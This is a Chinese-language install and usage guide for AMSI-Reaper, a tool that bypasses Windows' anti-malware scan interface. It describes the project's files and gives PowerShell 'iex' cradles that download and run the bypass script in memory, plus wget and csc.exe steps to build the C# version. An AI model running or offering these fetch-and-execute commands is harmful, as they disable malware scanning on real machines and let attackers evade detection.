AMSI-Reaper 使用与安装指南

AMSI-Reaper 使用与安装指南

AMSI-Reaper 项目地址: https://gitcode.com/gh_mirrors/am/AMSI-Reaper

1. 项目目录结构及介绍

AMSI-Reaper 是一个专为绕过 Windows 中的 Anti-Malware Scan Interface (AMSI) 设计的安全研究工具，由 H0ru 开发。以下是该开源项目的主要目录结构：

.
├── src                   # 核心源代码目录
│   ├── AMSI-Reaper.ps1   # PowerShell 版本的主脚本文件
│   └── AMSI-Reaper.cs    # C# 版本的源代码文件，用于编译得到可执行的绕过工具
├── LICENSE               # 许可证文件，遵循 GPL-3.0 协议
└── README.md             # 项目说明文档，包含快速入门和工具概述

• src 目录下包含了两个核心文件，其中 AMSI-Reaper.ps1 是可以直接在 PowerShell 环境中执行的脚本文件，用于在内存中对特定进程实施 AMSI 绕过。而 AMSI-Reaper.cs 是采用 C# 编写的源代码文件，它需要通过 .NET Framework v4.0 编译成可执行程序以实现类似功能。

• LICENSE 文件详细说明了项目的授权条款。

• README.md 提供了关于项目目的、使用方法和重要警告的信息。

2. 项目的启动文件介绍

PowerShell 版本启动

项目的核心在于 AMSI-Reaper.ps1 脚本。要立即使用 PowerShell 版本，可以通过以下命令直接从仓库下载并执行：

iex (iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1)

或使用 Net.WebClient 类进行下载后再执行：

iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1')

C# 版本启动

对于开发者或希望编译后的版本，需先下载 AMSI-Reaper.cs 文件，然后利用 .NET Framework 的 csc.exe 编译器将其编译为 .exe 文件。命令如下：

wget https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs
csc.exe AMSI-Reaper.cs

编译完成后，执行生成的 .exe 文件即可。

3. 项目的配置文件介绍

AMSI-Reaper项目本身并不直接提供典型的配置文件，其配置或目标操作主要通过脚本参数或直接在调用脚本时指定。因此，无需单独寻找或编辑配置文件。对于特定的运行设置（如目标进程选择或定制化绕过逻辑），用户可能需要直接修改脚本中的相关部分或者在命令行调用时通过参数来指定。

以上就是关于 AMSI-Reaper 开源项目的简单安装和使用说明。请注意，此工具具有特定的研究和教育用途，应合法且负责任地使用，避免违法或不道德的行为。

AMSI-Reaper 项目地址: https://gitcode.com/gh_mirrors/am/AMSI-Reaper